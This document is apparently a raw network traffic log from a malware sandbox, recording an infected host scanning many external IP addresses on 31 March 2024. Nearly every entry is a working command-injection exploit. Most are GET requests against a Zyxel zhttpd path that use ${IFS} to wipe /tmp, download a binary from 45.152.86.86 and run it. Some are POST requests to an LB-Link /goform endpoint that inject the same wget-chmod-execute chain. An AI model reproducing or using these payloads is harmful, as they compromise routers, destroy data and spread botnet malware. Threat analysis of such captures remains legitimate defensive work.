                                        Mar 31, 2024 09:22:24.663945913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8098192.168.2.2342372191.79.220.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664012909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8099192.168.2.2352854131.176.141.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664052010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8100192.168.2.235592643.28.108.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664129019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8101192.168.2.2346820220.209.57.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664201975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8102192.168.2.2351490134.38.34.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664277077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8103192.168.2.2352534162.137.164.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664326906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8104192.168.2.2333896176.161.217.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664407969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8105192.168.2.234187820.152.165.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664474964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8106192.168.2.2338288185.198.237.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.664557934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8107192.168.2.2334048212.193.17.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674107075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8108192.168.2.2350196146.58.94.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674169064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8109192.168.2.234239287.120.17.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674227953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8110192.168.2.234543295.91.28.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674280882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8111192.168.2.233468046.5.145.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674364090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8112192.168.2.2337814130.127.152.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674407005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8113192.168.2.234968818.254.160.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674474001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8114192.168.2.2352162121.90.230.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674523115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8115192.168.2.2356428181.185.145.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674581051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8116192.168.2.2335062207.178.213.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674644947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8117192.168.2.234968687.161.235.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674725056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8118192.168.2.234215875.58.227.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674771070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8119192.168.2.2348796100.191.187.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.674859047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8120192.168.2.2339388104.16.126.1818080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.606369972 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:25.700867891 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8121192.168.2.2348354164.103.91.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.674894094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8122192.168.2.2359402102.47.3.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.674964905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8123192.168.2.234953071.151.73.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675035000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8124192.168.2.2341172124.176.17.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675076008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8125192.168.2.2345240138.5.2.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675137997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8126192.168.2.2334834111.197.133.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675201893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8127192.168.2.234517048.245.152.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675266027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8128192.168.2.2341834109.222.64.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675342083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8129192.168.2.2352536113.3.17.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675400972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8130192.168.2.2353538205.145.229.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675461054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8131192.168.2.2360854210.209.232.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675501108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8132192.168.2.2360538135.156.167.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675580978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8133192.168.2.2345846133.219.126.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675652027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8134192.168.2.234070289.142.41.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675702095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8135192.168.2.23604584.219.190.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675770044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8136192.168.2.235902423.55.20.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675834894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8137192.168.2.2346826122.99.115.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675945044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8138192.168.2.2359686137.177.199.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.675980091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8139192.168.2.233701699.164.61.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.676022053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8140192.168.2.2353820114.91.212.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.676106930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8141192.168.2.2352750130.130.146.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.676168919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8142192.168.2.2340180190.54.81.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.676289082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8143192.168.2.234932646.1.193.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.676325083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8144192.168.2.2346496205.248.247.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.677066088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8145192.168.2.2351892153.146.174.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:25.677123070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8146192.168.2.2349482148.250.245.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:26.681304932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8147192.168.2.234194427.12.172.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:26.681341887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8148192.168.2.235842837.239.232.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685509920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8149192.168.2.2342274124.50.200.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685548067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8150192.168.2.2351024199.1.158.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685601950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8151192.168.2.234112036.3.89.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685637951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8152192.168.2.2356886121.22.127.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685848951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8153192.168.2.2346118189.60.234.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.685900927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8154192.168.2.235006694.123.57.2048080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:27.944649935 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8155192.168.2.2343424103.45.97.638080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.061901093 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:28.399018049 CEST239INHTTP/1.1 307 Forbidden Redirect
                                        Location: http://icp.pppf.com.cn
                                        Content-Length: 105
                                        Content-Type: text/html
                                        Connection: Close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>Domain Name Forbidden</title></head><body><h1>Domain Name Forbidden</h1></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8156192.168.2.2335450185.245.221.1128080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.135399103 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
